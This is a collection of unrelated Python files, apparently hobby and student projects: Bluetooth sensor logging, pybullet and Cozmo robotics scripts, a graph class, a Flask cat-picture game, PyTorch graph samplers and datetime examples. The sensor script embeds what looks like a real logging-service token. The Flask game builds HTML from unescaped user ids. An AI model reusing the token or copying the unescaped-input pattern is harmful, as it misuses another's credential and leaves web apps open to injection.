\n#r7insight downloaded from https://pypi.org/project/r7insight_python/\nimport bluetooth\nfrom r7insight import R7InsightHandler\nimport logging\nimport time\nimport Adafruit_DHT\nimport datetime \n\n\nsensor = 11\npin = 23\n\nserver_sock=bluetooth.BluetoothSocket( bluetooth.RFCOMM )\n\nport = 1\nserver_sock.bind((\"\",port))\nserver_sock.listen(1)\n\nlog = logging.getLogger('r7insight')\nlog.setLevel(logging.INFO)\n\n#Insightops Log Token\ntest = R7InsightHandler('24568bbf-d50f-4922-b2fc-aede9a941f98', 'eu')\n\n\nlog.addHandler(test)\n\nclient_sock,address = server_sock.accept()\nprint(\"Accepted connection from \",address)\n\nwhile True:\n \n #Record After every 5 sec\n data = client_sock.recv(1024)\n print(\"received [%s]\" % data)\n \n #Reading Data from RPi 1 Sensor\n log.info(data)\n \n #Reading Data from RPi 2 Sensor(Server)\n ts = str(datetime.datetime.now())\n humidity, temperature = Adafruit_DHT.read_retry(sensor, pin)\n \n log.info(ts + \" SensorID = Sam\" + \" Temperature = {}, Humidity= {} \".format(temperature,humidity))\n#client_sock.close()\n\n\n\n\n","sub_path":"bluetooth_serverPi.py","file_name":"bluetooth_serverPi.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"510273360","text":"import pybullet as p\nimport time\nimport pybullet_data\nfrom termcolor import colored\nimport os\nfrom ipdb import set_trace as tt\ndef printGreen(string):\n \"\"\"\n Print a string in green in the terminal\n :param string: (str)\n \"\"\"\n print(colored(string, 'green'))\n\n\ndef printYellow(string):\n \"\"\"\n :param string: (str)\n \"\"\"\n print(colored(string, 'yellow'))\n\n\ndef printRed(string):\n \"\"\"\n :param string: (str)\n \"\"\"\n print(colored(string, 'red'))\n\n\ndef printBlue(string):\n \"\"\"\n :param string: (str)\n \"\"\"\n print(colored(string, 'blue'))\n\n\n_urdf_path = pybullet_data.getDataPath()\ncustom_urdf_path = \"/home/tete/work/SJTU/kuka_play/robotics-rl-srl/urdf\"\nsjtu_urdf_path = \"/home/tete/work/SJTU/kuka_play/robotics-rl-srl/urdf_robot\"\npybullet_data_path = \"/home/tete/work/SJTU/kuka_play/robotics-rl-srl/pybullet_data\"\n# physicsClient = p.connect(p.DIRECT)#or p.DIRECT for non-graphical version\nphysicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n# p.setAdditionalSearchPath(pybullet_data.getDataPath()) #optionally\n\n#p.setAdditionalSearchPath('urdf') #optionally\np.setGravity(0,0,0.0)\np.computeViewMatrix(cameraEyePosition=[0.5,0.5,0.5], cameraTargetPosition=[0,0,0], cameraUpVector=[0,0,0])\n\nplaneId = p.loadURDF(os.path.join(_urdf_path, \"plane.urdf\"))\n\ncubeStartPos = [0,0,1]\ncubeStartOrientation = p.getQuaternionFromEuler([0,0,0])\n#r2d2Id = p.loadURDF(os.path.join(_urdf_path, \"r2d2.urdf\"), cubeStartPos, cubeStartOrientation)\n# gripperId = p.loadURDF(os.path.join(pybullet_data_path, \"gripper/wsg50_one_motor_gripper_left_finger.urdf\"), [0,0,0])\n# huskyId = p.loadURDF(os.path.join(pybullet_data_path, \"husky/husky.urdf\"), [0,0,0])\n# jengaId = p.loadURDF(os.path.join(pybullet_data_path, \"jenga/jenga.urdf\"), [0,0,0])\n# kuka = p.loadURDF(os.path.join(pybullet_data_path, \"kuka_iiwa/model_vr_limits.urdf\"), [0,0,0])\n# lego = p.loadURDF(os.path.join(pybullet_data_path, \"lego/lego.urdf\"), [0,0,0])\n# quadruped1 = p.loadURDF(os.path.join(pybullet_data_path, \"quadruped/minitaur.urdf\"), [0,0,0])\n# quadruped = p.loadURDF(os.path.join(pybullet_data_path, \"quadruped/minitaur_fixed_all.urdf\"), [0,0,0])\n# racer = 
p.loadURDF(os.path.join(pybullet_data_path, \"racecar/racecar.urdf\"), [0,0,0])\n# table = p.loadURDF(os.path.join(pybullet_data_path, \"table_square/table_squre.urdf\"), [0,0,0])\n# tray = p.loadURDF(os.path.join(pybullet_data_path, \"tray/tray_textured2.urdf\"), [0,0,0])\n# object = p.loadURDF(os.path.join(pybullet_data_path, \"teddy_vhacd.urdf\"), [0,0,0])\n# object2 = p.loadSDF(os.path.join(pybullet_data_path, \"stadium.sdf\"))\n# objects = p.loadSDF(os.path.join(_urdf_path, \"kuka_iiwa/kuka_with_gripper2.sdf\"))\n# sjtuID = p.loadURDF(os.path.join(sjtu_urdf_path,\"inmoov_right_hand.urdf\"), [1,1,1] )\n# another = p.loadSDF(os.path.join(sjtu_urdf_path, \"tomato/newsdf.sdf\"))\n\nanother = p.loadURDF(os.path.join(sjtu_urdf_path, \"tomato_plant.urdf\"))\nsjtuID = p.loadURDF(os.path.join(sjtu_urdf_path,\"inmoov_col.urdf\"), [1,1,0] )\n# modelId = p.loadURDF(os.path.join(pybullet_data_path, \"kuka_iiwa/model_free_base.urdf\"),[1,1,1])\n\nfor i in range (1000000):\n # time.sleep(0.05)\n p.stepSimulation()\ntime.sleep(1.)\n# cubePos, cubeOrn = p.getBasePositionAndOrientation(boxId)\n#printRed(\"{} {}\".format(cubePos,cubeOrn))\np.disconnect()\n","sub_path":"environments/sjtubot_gym/bulletlearn.py","file_name":"bulletlearn.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133274599","text":"#n=int(input())\nn,x,y=map(int,input().split())\n#l=list(map(int,input().split()))\n#l=[list(map(int,input().split())) for i in range(n)]\n\n#adjl=[[0 for i in range(n)] for j in range(n)]\n\ndic={}\n\nfor i in range(n):\n for j in range(i,n):\n #if i>=j:\n # continue\n dis=j-i\n maybe=abs(x-(i+1))+1+abs(y-(j+1))\n dis=min(dis,maybe)\n #adjl[i][j]=dis\n dic[dis]=dic.get(dis,0)+1\n\"\"\"\nfor i in range(n):\n for j in range(i,n):\n #if i>=j:\n # continue\n dis=adjl[i][j]\n dic[dis]=dic.get(dis,0)+1\n\"\"\"\nfor k in range(1,n):\n print(dic.get(k,0))\n ","sub_path":"ABC160/ABC160_D.py","file_name":"ABC160_D.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"546640567","text":"class Graph:\n \"\"\"\n vertices: list\n A list of str representing the vertices\n adj_list: dict\n A dict mapping vertices (str) to list of str representing the neighbors (adjacency list)\n \"\"\"\n def __init__(self, vertices: list, adj_list: dict):\n self.vertices = vertices\n self.adj_list = adj_list\n\n def __str__(self):\n graphstr = \"\"\n for (i, vertex) in enumerate(self.vertices):\n graphstr += vertex + \":\"\n for (j, neighbor) in enumerate(self.adj_list[vertex]):\n graphstr += neighbor\n if j != len(self.adj_list[vertex]) - 1:\n graphstr += \",\" # there are still more neighbors to print\n graphstr += \";\" # finished printing current vertex\n if i != len(self.vertices) - 1:\n graphstr += \" \" # there are still more vertices to print\n graphstr += \";\" # finished printing the graph\n return graphstr\n\n def get_degree(self, vertex: str) -> int:\n return len(self.adj_list[vertex])\n\n def get_number_of_vertices(self) -> int:\n return len(self.vertices)\n\n # If you have an undirected graph, divide this value by 2\n def get_number_of_edges(self) -> int:\n num_edges = 0\n for v in self.vertices:\n num_edges += self.get_degree(v)\n return num_edges\n\n def get_neighbors(self, vertex: str) -> list:\n return self.adj_list[vertex]\n\n def is_adjacent(self, vertex_a: str, vertex_b: str) -> bool:\n return vertex_b in 
self.adj_list[vertex_a]\n\n def remove_vertex(self, vertex: str):\n for neighbor in self.adj_list[vertex]:\n self.adj_list[neighbor].remove(vertex)\n del self.adj_list[vertex]\n self.vertices.remove(vertex)\n\ndef get_graph_from_str(graphstr: str) -> Graph:\n vertices = []\n adj_list = dict()\n\n # GRAPH STRING PARSER (FINITE STATE MACHINE)\n # 0: initial, 1: adding new vertex, 2: adding new neighbor\n parser_state = 0\n # auxiliary variables\n vertex_name = \"\"\n neighbor_name = \"\"\n for c in graphstr:\n if c == \" \": # skip spaces\n continue\n\n if parser_state == 0:\n current_vertex = \"\"\n if c.isalnum():\n vertex_name += c\n parser_state = 1\n elif c == \";\":\n # success\n pass\n elif parser_state == 1:\n if c.isalnum():\n vertex_name += c\n elif c == \":\":\n current_vertex = vertex_name\n vertices.append(current_vertex)\n adj_list[current_vertex] = []\n vertex_name = \"\"\n parser_state = 2\n elif parser_state == 2:\n if c.isalnum():\n neighbor_name += c\n elif c == \",\":\n adj_list[current_vertex].append(neighbor_name)\n neighbor_name = \"\"\n elif c == \";\":\n if neighbor_name != \"\":\n adj_list[current_vertex].append(neighbor_name)\n neighbor_name = \"\"\n parser_state = 0\n\n return Graph(vertices, adj_list)\n","sub_path":"graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"102042240","text":"#!/usr/bin/env python3\n\n# Copyright (c) 2018, Team skynet.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License in the file LICENSE.txt or at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n'''Make Cozmo do a little slalom race:\n start/finish line\n\t|\ncozmo---- 30 cm ---- cube_1 ---- 30 cm ---- cube_2 ---- 30 cm ---- cube_3\n\t|\nCozmo has to pick up cube_3 after encircling it and place it on cube_1\nFinally, cozmo has to cross the start/finish line\n'''\n\nimport asyncio\n\nimport cozmo\nfrom cozmo.util import degrees, distance_mm, speed_mmps, Pose\n\ndef cozmo_search_cube (robot: cozmo.robot.Robot):\n look_around = robot.start_behavior(cozmo.behavior.BehaviorTypes.LookAroundInPlace)\n\n # try to find a block\n cube = None\n\n try:\n cube = robot.world.wait_for_observed_light_cube(timeout=10)\n\n except asyncio.TimeoutError:\n print(\"Didn't find a cube :-(\")\n\n finally:\n # whether we find it or not, we want to stop the behavior\n look_around.stop()\n return cube\n\n\n\ndef cozmo_program(robot: cozmo.robot.Robot):\n \n robot.drive_wheels(110, 220, 0, 0, 0.7)\n robot.drive_wheels(220, 110, 0, 0, 0.7)\n robot.drive_wheels(220, 220, 0, 0, 0.55)\n robot.drive_wheels(220, 110, 0, 0, .9)\n robot.drive_wheels(220, 220, 0, 0, .2)\n robot.drive_wheels(110, 220, 0, 0, .9)\n robot.drive_wheels(220, 220, 0, 0, .2)\n robot.drive_wheels(110, 220, 0, 0, .9)\n robot.drive_wheels(220, 220, 0, 0, .4)\n robot.drive_wheels(220, 40, 0, 0, .2)\n robot.drive_wheels(220, 115, 0, 0, 2.5)\n robot.drive_wheels(220, 85, 0, 0, 1.9)\n robot.drive_wheels(220, -220, 0, 0, .25)\n\n cube = cozmo_search_cube(robot)\n while cube == 
None :\n cube = cozmo_search_cube(robot)\n action = robot.pickup_object(cube, True, True, 3)\n result = action.wait_for_completed(timeout=30)\n \n robot.drive_wheels(220, -220, 0, 0, .2)\n robot.drive_wheels(-220, -220, 0, 0, .5)\n robot.go_to_pose(Pose(310, 2, 0, angle_z=degrees(-90)), relative_to_robot=False).wait_for_completed()\n\n\n cube2 = cozmo_search_cube(robot)\n while cube2 == None :\n cube2 = cozmo_search_cube(robot)\n \n # Now try to place that cube on the 2nd one\n current_action = robot.place_on_object(cube2, num_retries=3)\n current_action.wait_for_completed()\n if current_action.has_failed:\n code, reason = current_action.failure_reason\n result = current_action.result\n print(\"Place On Cube failed: code=%s reason='%s' result=%s\" % (code, reason, result))\n\n robot.go_to_pose(Pose(-300, 0, 0, angle_z=degrees(-90)), relative_to_robot=False).wait_for_completed()\n\n\ncozmo.run_program(cozmo_program)\n","sub_path":"sprint2/slalom/slalom.py","file_name":"slalom.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"624811577","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.8'\n\nsetup(name='SaladeDeFruits',\n version=version,\n description=\"A skinning middleware\",\n long_description=open('README.txt').read(),\n # Get strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n 'Topic :: Internet :: WWW/HTTP :: WSGI :: Middleware',\n 'Operating System :: OS Independent',\n ],\n keywords='wsgi middleware skin lxml pyquery',\n author='Gael Pasgrimaud',\n author_email='gael@gawel.org',\n url='http://www.gawel.org/docs/SaladeDeFruits/index.html',\n license='MIT',\n packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n # -*- Extra requirements: -*-\n 'WebOb',\n 'Paste',\n 'restkit',\n 'pyquery',\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [paste.filter_app_factory]\n main = saladedefruits.saladier:make_salade\n [paste.app_factory]\n rewrite = saladedefruits.rewrite:make_rewrite\n \"\"\",\n )\n","sub_path":"pypi_install_script/SaladeDeFruits-0.8.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"133843895","text":"# Andrew Bogdan\n# app.py\n\"\"\"\n\tThe thing that interacts with the OS and what's imported by __main__ through __init__.\n\"\"\"\n\n# Imports\nimport copy\nimport curses\nimport json\nimport os\nimport traceback\n\nfrom mirec_miskuf_json import json_loads_str\n\nfrom renderer import Renderer\nfrom game import Game\n\n# Classes\nclass App(object):\n\t\"\"\"\n\tThe all-encompassing class which connects the computer, game, and the renderer\n\n\tApp.__init__(self)\n\tApp._loop(self)\n\tApp._quit(self)\n\tApp.stop(self)\n\tApp.start(self)\n\n\tApp._game\n\tApp._is_running\n\tApp._options\n\tApp._renderer\n\tApp._screen\n\t\"\"\"\n\n\tdef __init__(self):\n\t\t\"\"\"Intialize App, starting the game.\"\"\"\n\n\t\t# Load game options\n\t\tgame_options_path = os.path.join(\tos.path.dirname(__file__), \n\t\t\t\t\t\t\t\t\t\t\t\"options.json\")\n\t\tgame_options_file = open(game_options_path, 'r')\n\t\tself._options = json_loads_str(game_options_file.read())\n\t\tgame_options_file.close()\n\n\t\t# Load renderer options\n\t\trenderer_options_path = 
os.path.join(\tos.path.dirname(__file__),\n\t\t\t\t\t\t\t\t\t\t\t\t\"renderer\",\n\t\t\t\t\t\t\t\t\t\t\t\t\"options.json\")\n\t\trenderer_options_file = open(renderer_options_path, 'r')\n\t\trenderer_options = json_loads_str(renderer_options_file.read())\n\t\trenderer_options_file.close()\n\n\t\t# Initialize variables\n\t\tself._is_running = False;\n\n\t\tself._game = Game(self, self._options)\n\t\tself._renderer = Renderer(self, renderer_options)\n\n\t\t# Start curses for I/O\n\t\tself._screen = curses.initscr()\n\n\t\tcurses.noecho()\n\t\tcurses.cbreak()\n\t\tcurses.curs_set(0)\n\t\tself._screen.nodelay(1)\n\t\tself._screen.keypad(1)\n\n\tdef _loop(self):\n\t\t\"\"\"Perform a main game loop.\"\"\"\n\n\t\t# Loop the subclasses\n\t\tself._game.loop()\n\t\tself._renderer.loop()\n\n\t\t# Get and evaluate I/O\n\t\tkey = self._screen.getch()\n\n\t\t# Evaluate text input\n\t\tif key != curses.ERR:\n\t\t\ttry:\n\n\t\t\t\tself._game.eval_echo(chr(key))\n\n\t\t\texcept ValueError:\n\n\t\t\t\tpass\n\n\t\t# Evaluate the first key binding which does something\n\t\tif str(key) in self._options[\"controls\"] and key != curses.ERR:\n\t\t\tfor control_string in self._options[\"controls\"][str(key)]:\n\t\t\t\t# This if clause executes the action and returns a boolean if it did anything\n\t\t\t\tif self._game.eval_control_string(control_string):\n\n\t\t\t\t\tbreak\n\n\tdef _quit(self):\n\t\t\"\"\"Clean up and shut down the app.\"\"\"\n\n\t\t# Shut down curses\n\t\tself._screen.keypad(0)\n\t\tself._screen.nodelay(0)\n\t\tcurses.curs_set(1)\n\t\tcurses.nocbreak()\n\t\tcurses.echo()\n\t\tcurses.endwin()\n\n\tdef stop(self):\n\t\t\"\"\"Stop looping.\"\"\"\n\n\t\tself._is_running = False\n\n\tdef start(self):\n\t\t\"\"\"Start looping; this is called independently and is the last thing to run.\"\"\"\n\n\t\t# Loop\n\t\tself._is_running = True\n\n\t\twhile self._is_running:\n\t\t\ttry:\n\n\t\t\t\tself._loop()\n\n\t\t\texcept:\n\n\t\t\t\tself._quit()\n\t\t\t\ttraceback.print_exc()\n\t\t\t\treturn\n\n\t\t# Quit when the loop stops\n\t\tself._quit()","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"584129374","text":"from flask import Flask\nfrom flask import render_template\nfrom mongokit import Connection, Document\nimport random, time\nfrom dateutil.relativedelta import relativedelta\n\n# attrs = ['years', 'months', 'days', 'hours', 'minutes', 'seconds']\n# human_readable = lambda delta: ['%d %s' % (getattr(delta, attr), getattr(delta, attr) > 1 and attr or attr[:-1]) \n# for attr in attrs if getattr(delta, attr)]\n\nMONGODB_HOST = 'localhost'\nMONGODB_PORT = 27017\nMAX_LEADERS = 5\n\ngrumpy = [ 107867, 242468, 365880, 559237, 678106, 766439, 876973,\n 111316, 262374, 413459, 560260, 680595, 769432, 887917,\n 111349, 266346, 428552, 560412, 680802, 791768, 892302,\n 117285, 277852, 430899, 567038, 686248, 794427, 902504,\n 120069, 284509, 450628, 567934, 694734, 795988, 915628,\n 155707, 288847, 466353, 583052, 700295, 800234, 925650,\n 156498, 292204, 471397, 599680, 704128, 807242, 936019,\n 157906, 313128, 499968, 616435, 724766, 810541, 940901,\n 186121, 325405, 524086, 637848, 725871, 826452, 941591,\n 198347, 330189, 528056, 640840, 740087, 829648, 957650,\n 209605, 343591, 543506, 647287, 740548, 858786, 966046,\n 230678, 354751, 559088, 677444, 748816, 875843, 980420 ]\n\nhappy = [ 103829, 230452, 295092, 449782, 629628, 753141, 933639, \n 140455, 235053, 328626, 
460783, 651405, 767693, 949128, \n 201217, 236412, 403882, 520791, 700423, 853772, 963994, \n 227484, 255014, 442211, 553201, 742516, 899335 ]\n\napp = Flask(__name__)\napp.config.from_object(__name__)\nconnection = Connection(app.config['MONGODB_HOST'],\n app.config['MONGODB_PORT'])\n\n#Database schema\nclass Player(Document):\n # __collection__ = 'players'\n # __database__ = 'happycat'\n # use_schemaless = True\n structure = {\n 'id': unicode,\n 'start': float,\n 'correct': int,\n 'time': float,\n 'round': int,\n 'best': float,\n 'last': float,\n 'count': int\n }\n indexes = [\n {\n 'fields':'id',\n 'unique':True,\n }]\n default_values = {\n 'time': float('Inf'),\n 'best': 0,\n 'last': 0,\n 'round': 1,\n 'count': 0\n }\n use_dot_notation = True\n\n#Register the document with connection\nconnection.register([Player])\ncollection = connection['happycat'].players\n\n@app.route(\"/\")\ndef main_page():\n return render_template('index.html')\n\n@app.route(\"/prizes\")\ndef prizes():\n return render_template('prizes.html')\n\n@app.route(\"/contact\")\ndef contact():\n return render_template('contact.html')\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html')\n\ndef santize_id(id):\n return id.split(\"@andrew.cmu.edu\")[0].lower()\n\n@app.route('/play/')\ndef start_game(id):\n # return str(collection.Player.find_one({'id': u'gauravt'}));\n id = santize_id(id)\n\n #Generate random images\n correct = happy[random.randint(0, len(happy)-1)]\n images = random.sample(grumpy, 17)\n images.append(correct)\n random.shuffle(images)\n\n p = collection.Player.find_and_modify(\n query={\"id\": id },\n update={\"$set\": { \n \"start\": time.time(),\n \"correct\": correct,\n }},\n new= True,\n upsert=True)\n\n if not 'round' in p:\n rnd = 1\n else:\n rnd = p['round']\n \n # if not p['round'] < 4:\n # p['time'] = 0.0\n # p['correct'] = 0\n # p['round'] = 1\n\n html = '
'\n    html += 'Round: ' + str(rnd) + '/3'\n    html += '''\n    Find the happy cat!\n    '''\n\n    # each cat image links to the /check/ route for this player\n    for i in range(0,18):\n        html += '''\n            <a href=\"/check/''' + str(images[i]) + '''/''' + id + '''\"><img src=\"''' + str(images[i]) + '''\"></a>\n        '''\n\n    return str(html)\n\n@app.route('/check/<image>/<id>')\ndef check(image=None, id=None):\n    html = \"\"\n    id = santize_id(id)\n    correct = False\n\n    if image and id:\n        p = collection.Player.find_one({'id': id}); \n        if p:\n            # print image, p['correct']\n            if not 'count' in p:\n                p['count'] = 0\n            \n            if str(image) == str(p['correct']):\n                correct = True\n                # print \"Correct\"\n\n                #count corrects\n                p['count'] += 1\n                # print p['count']\n            else:\n                p['count'] -= 1\n                # print \"Not correct\"\n\n            if not 'best' in p:\n                p['best'] = 0.0\n\n            if not 'last' in p:\n                p['last'] = 0.0\n\n            cur = time.time()\n            elapsed = cur - p['start']\n\n            if not 'time' in p:\n                p['time'] = elapsed\n            else:\n                p['time'] += elapsed\n\n            if not 'round' in p:\n                p['round'] = 2\n            else:\n                p['round'] = p['round'] + 1\n            \n            if p['round'] > 3:\n                #Done with final\n                # print float(p['count']) / p['time']\n                p['last'] = float(p['count']) / p['time']\n\n                if 'best' in p:\n                    if p['best'] < p['last']:\n                        p['best'] = p['last']\n                else:\n                    p['best'] = p['last']\n\n                p['time'] = 0.0\n                p['count'] = 0\n                p['round'] = 1\n\n            p.save()\n        \n    return str(correct) + \":\" + str(p['round'])\n\n@app.route('/score/<id>')\ndef score(image=None, id=None):\n    id = santize_id(id)\n    p = collection.Player.find_one({'id': id});\n\n    if not 'best' in p:\n        p['best'] = 0.0\n\n    if not 'last' in p:\n        p['last'] = 0.0\n\n    p.save()\n\n    html = ''\n\n    if p:\n        if 'last' in p:\n            html += \"Meow! You scored \" + str(round(p['last'], 2)) + \". Your best: \" + str(round(p['best'], 2)) + \".\"\n\n    html += ' <a href=\"/leaderboard\">See leaderboard</a>'\n\n    return html\n\n@app.route('/leaderboard')\ndef get_leaderboard():\n    leaders = list(collection.Player.find().sort([(\"best\", -1)]).limit(MAX_LEADERS))\n    # leaders = list(collection.Player.find({'best': {'$exists': True}})._addSpecial( '\"$orderby\"', { 'best' : -1 } ))\n    html = '''\n    Leaderboard\n    <table>\n    <tr><th>Player</th><th>Score</th></tr>\n    '''\n    for l in leaders:\n        html += \"<tr>\"\n        html += \"<td>\" + l['id'] + \"</td>\"\n        html += \"<td>\" + str(l['best']) + \"</td>\"\n        html += \"</tr>\"\n\n    html += \"</table>\"\n    html += '
    '\n \n return str(html)\n\n \nif __name__ == \"__main__\":\n app.run(debug=True)\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"77534543","text":"from abc import ABC, abstractmethod\nfrom collections import deque\n\nimport numpy as np\nimport random\nimport torch\nfrom torch.utils.data import DataLoader\n\n\ndef generic_bfs_edges(G, source, batch_size,\n neighbors=None, depth_limit=None):\n \"\"\"\n Reference: https://networkx.github.io/documentation/stable/_modules/networkx/algorithms/traversal/breadth_first_search.html\n added batch_size to control size of bfs subgraph\n \"\"\"\n visited = {source}\n edges = []\n if depth_limit is None:\n depth_limit = len(G)\n queue = deque([(source, depth_limit, neighbors(source))])\n while queue:\n parent, depth_now, children = queue[0]\n try:\n child = next(children)\n if child not in visited:\n edges.append((parent, child))\n visited.add(child)\n if len(visited) == batch_size:\n break\n if depth_now > 1:\n queue.append((child, depth_now - 1, neighbors(child)))\n except StopIteration:\n queue.popleft()\n return visited, edges\n\n\nclass BaseSampler(ABC):\n def __init__(self, data, batch_size):\n self.id_map = data.dataset.id_map\n self.gs_map = data.dataset.gs_map\n self.interaction_combo_graph = data.dataset.interaction_combo_nxgraph\n self.batch_size = batch_size\n self.num_nodes = self.interaction_combo_graph.number_of_nodes()\n self.nodes_visited_counter = np.zeros(self.num_nodes)\n\n @abstractmethod\n def sample_next_training_batch(self):\n pass\n\n\nclass EverythingSampler(BaseSampler):\n \"\"\"\n Sample all the pairs in the data at once\n \"\"\"\n def __init__(self, data):\n super().__init__(data, 0)\n self.batch_size = len(data.dataset.train_pairs)\n self.data_loader = DataLoader(data, batch_size=self.batch_size, shuffle=True)\n self.data_iterable = iter(self.data_loader)\n\n def sample_next_training_batch(self):\n try:\n sampled_pairs = next(self.data_iterable)\n except StopIteration:\n self.data_iterable = iter(self.data_loader)\n sampled_pairs = next(self.data_iterable)\n batch_gids = sampled_pairs.cpu().detach().numpy()\n sampled_gids = np.unique(batch_gids)\n return batch_gids, sampled_gids, None\n\n\nclass NeighborSampler(BaseSampler):\n \"\"\"\n Sample pairs based on a sampled subgraph\n \"\"\"\n def __init__(self, data, neighbor_size, batch_size):\n super().__init__(data, batch_size)\n self.neighbor_size = neighbor_size #float from 0 to 1 or int\n\n def neighbors_sampler(self, node):\n neighbors = list(self.interaction_combo_graph.neighbors(node))\n random.shuffle(neighbors)\n num_sample = self.neighbor_size if type(self.neighbor_size) == int else int(\n len(neighbors) * self.neighbor_size)\n neighbors = set(neighbors[:num_sample])\n return iter(neighbors)\n\n def sample_next_training_batch(self):\n sample_nodes, bfs_edges = self.recurse_sample_batch_size()\n subgraph = self.interaction_combo_graph.subgraph(sample_nodes).copy()\n batch_gids = np.asarray(list(map(lambda edge: (self.id_map[edge[0]], self.id_map[edge[1]]), subgraph.edges)))\n return batch_gids, [self.id_map[node] for node in sample_nodes], subgraph\n\n def recurse_sample_batch_size(self):\n sample_nodes = set()\n sample_edges = []\n while len(sample_nodes) < self.batch_size:\n batch_size = self.batch_size - len(sample_nodes)\n rand_node = random.randint(0, self.num_nodes - 1)\n while rand_node in sample_nodes or 
(np.any(self.nodes_visited_counter == 0) and self.nodes_visited_counter[rand_node] > 0):\n rand_node = random.randint(0, self.num_nodes - 1)\n self.nodes_visited_counter[rand_node] += 1\n bfs_nodes, bfs_edges = generic_bfs_edges(self.interaction_combo_graph, rand_node, batch_size,\n neighbors=self.neighbors_sampler)\n sample_nodes = sample_nodes.union(bfs_nodes)\n sample_edges.append(bfs_edges)\n return sample_nodes, sample_edges\n\n\nclass RandomSampler(BaseSampler):\n \"\"\"\n Randomly sampler pairs and take all induced pairs\n \"\"\"\n def __init__(self, data, batch_size, sample_induced=False):\n super().__init__(data, batch_size)\n self.data_loader = DataLoader(data, batch_size=batch_size, shuffle=True)\n self.data_iterable = iter(self.data_loader)\n self.sample_induced = sample_induced\n\n def sample_next_training_batch(self):\n try:\n sampled_pairs = next(self.data_iterable)\n except StopIteration:\n self.data_iterable = iter(self.data_loader)\n sampled_pairs = next(self.data_iterable)\n if self.sample_induced:\n return self.sample_induced_pairs(sampled_pairs)\n else:\n batch_gids = sampled_pairs.cpu().detach().numpy()\n sampled_gids = np.unique(batch_gids)\n return batch_gids, sampled_gids, None\n\n def sample_induced_pairs(self, given_links):\n unique_gids = torch.unique(given_links).cpu().detach().numpy()\n ids = [self.gs_map[gid] for gid in unique_gids]\n subgraph = self.interaction_combo_graph.subgraph(ids)\n batch_gids = np.asarray(list(map(lambda edge: (self.id_map[edge[0]], self.id_map[edge[1]]), subgraph.edges)))\n sampled_gids = np.unique(batch_gids)\n unique_ids = np.unique(list(subgraph.edges))\n for uid in unique_ids:\n self.nodes_visited_counter[uid] += 1\n return batch_gids, sampled_gids, None\n\n\nclass RandomGraphSampler(BaseSampler):\n def __init__(self, data, batch_size):\n super().__init__(data, batch_size)\n self.data_loader = DataLoader(data, batch_size=batch_size, shuffle=True)\n self.data_iterable = iter(self.data_loader)\n","sub_path":"src/sampler.py","file_name":"sampler.py","file_ext":"py","file_size_in_byte":5963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"344834348","text":"if __name__ == '__main__':\n import datetime\n\n today = datetime.date.today()\n print(today)\n print(repr(today))\n\n now = datetime.datetime.now()\n print(now)\n print(repr(now))\n\n\n from datetime import date\n\n\n bday = date(1993, 11, 24)\n print(bday.weekday())\n print(bday.isoweekday())\n\n\n from datetime import datetime, timedelta\n\n\n now = datetime.now() + timedelta(days=9)\n print(now)\n print(now.strftime('%a, %d. 
%b %Y'))\n print(now.strftime('%c'))\n print(now.strftime('%Z %X %f %j'))\n\n\n from datetime import datetime\n\n\n parsed = datetime.strptime(\n 'Wed Jun 13 14:47:12 2018',\n '%a %b %d %H:%M:%S %Y'\n )\n print(parsed.isoformat())\n\n\n from datetime import datetime\n\n\n # datetime.time does not allow math, so we use datetime\n a = datetime(2018, 6, 13, 14, 35)\n b = datetime(2018, 6, 13, 17, 22)\n\n print(b - a)\n\n\n from datetime import datetime\n\n\n a, b = datetime(2000, 2, 28, 23, 59), datetime(2000, 3, 1)\n c, d = datetime(2100, 2, 28, 23, 59), datetime(2100, 3, 1)\n\n print((b - a).days) # leap year\n print((d - c).days) # no leap year\n\n\n\n from datetime import datetime, timedelta\n\n\n now = datetime(2018,6,13,15,12,37)\n now = datetime.now()\n days137 = timedelta(days=137)\n\n print(now + days137)\n\n\n from datetime import datetime\n\n\n now = datetime.now()\n print(now.strftime('%c'))\n print(now.strftime('%a %b %#d %H:%M:%S %Y'))\n\n\n from datetime import datetime\n import locale\n\n\n locale.setlocale(locale.LC_ALL, 'de-DE')\n now = datetime.now() + timedelta(days=7,hours=9)\n print(now.strftime('%c'))\n print(now.strftime('%a %b %d %H:%M:%S %Y'))\n\n\n from datetime import datetime\n\n someday = datetime(2016,11,28,18,29,37)\n print(someday.strftime('%Y-%m-%dT%H:%M:%S'))\n print(someday.isoformat())\n\n\n from datetime import datetime\n\n\n a = 